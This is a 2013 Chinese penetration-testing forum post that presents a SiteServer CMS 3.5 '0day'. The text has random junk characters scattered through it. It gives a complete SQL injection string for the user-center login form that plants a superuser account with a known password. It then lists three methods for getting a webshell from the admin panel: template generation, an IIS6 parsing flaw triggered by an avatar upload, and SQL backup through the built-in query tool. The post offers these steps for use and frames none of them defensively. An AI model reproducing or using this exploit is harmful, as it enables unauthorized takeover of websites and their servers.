中国网络渗透测试联盟

标题: SiteServer CMS 0Day [打印本页]

作者: admin    时间: 2013-1-11 21:10
标题: SiteServer CMS 0Day
经测试秒杀最新的3.5版
- w1 ^# m# W2 l0 s$ _; `5 e8 z0 b1 D% r. l
stieserver官网:www.siteserver.cn) B1 T5 C# G5 ~  W9 D6 A

! `! |) A6 E6 M7 s1 n1 \ , U) \" H1 ?. K( k

5 V  o) X' o) R4 D; \EXP:: p7 E5 N. g6 p+ V( R; X4 ?- Z0 C+ {

5 S1 r% @  m7 M. V/ W& g直接访问UserCenter/login.aspx
2 j: h! h; r3 n# A/ H/ T6 a  q- l2 ?+ Z3 q0 E) T. C

6 W# N; c8 a" F3 N
/ n, h8 I9 G) @8 M" E/ c用户名处输入:3 g; f& l& \+ B# e$ Y6 ~+ c  t

; {: n! h5 s8 s. V5 {+ r  `& v1 T123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
$ i$ B4 o. p/ r. |9 g
% r4 @5 F. W6 y3 |  m( p8 G 8 C+ P. J0 g4 |4 b: S

! L& p1 G% g5 N" y( t' N+ ]* N/ H, ?7 E密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。) g$ w& H) h/ U8 Z; i5 ?. U/ c
6 d# C& }% Y0 b  G" |

2 H2 L9 M- n* A3 v! v* G- P* U2 ?' A/ U. R9 J0 Y
之后再访问后台SiteServer/login.aspx用插入的用户登陆
( g( `# E, A* P; _0 n6 c9 O0 C* ]$ Q. h6 |: |

2 s0 O* C5 F; z! w3 h  X
" E- ]1 B% ]7 T后台拿webshell的三种方法:, _' z, i2 R. J- X" a& p

2 i: Y- b, G& H) y- g一、5 ?" \0 z6 p. }9 C

% B8 K: Y$ ?) J* G8 r! s$ y站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx4 Z. {1 y& w. k' H" f5 y1 X

% [* v* r6 R( H9 x二、# s" ^+ h, K) H: I
( p1 K5 l0 I  Q: M; _0 u8 h: _
成员权限-》添加用户-》用户名为:1.asp# P$ N+ ]+ t4 X& A( I, f5 q+ [6 ?
8 R% h4 j* J* B6 }. L( y; E) ?/ e' R, I
http://127.0.0.1/usercenter/1 g4 L: s, g* K/ n1 h) O5 O
) ^; b7 w& l+ B( H9 B9 @3 ]% `. Z
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
. e# @9 p& e, R) A- N6 t+ F. l. d9 h( S; \- u% m& p( S5 }
(ps:后台添加用户时不会验证是否含有非法字符). p! ~0 j0 F. Y$ W

% Z# ?$ G7 D3 \% \  d1 P( S三、
/ k% l( ]- C8 v# O- W% V
+ r) D5 Q6 ^* X+ g9 n7 \系统工具-》实用工具-》机器参数查看
- [: b1 W. d! P# \, E可以看到数据库类型、名称,WEB路径( j+ }9 M$ Z; S( t" h
! G7 N- e, `  \: D
系统工具-》数据库工具-》SQL语句查询  ~% ~& Y; u( G. T
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。7 Q& X$ _# V, v& c8 h+ j
( i' f& {# c3 f; [





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2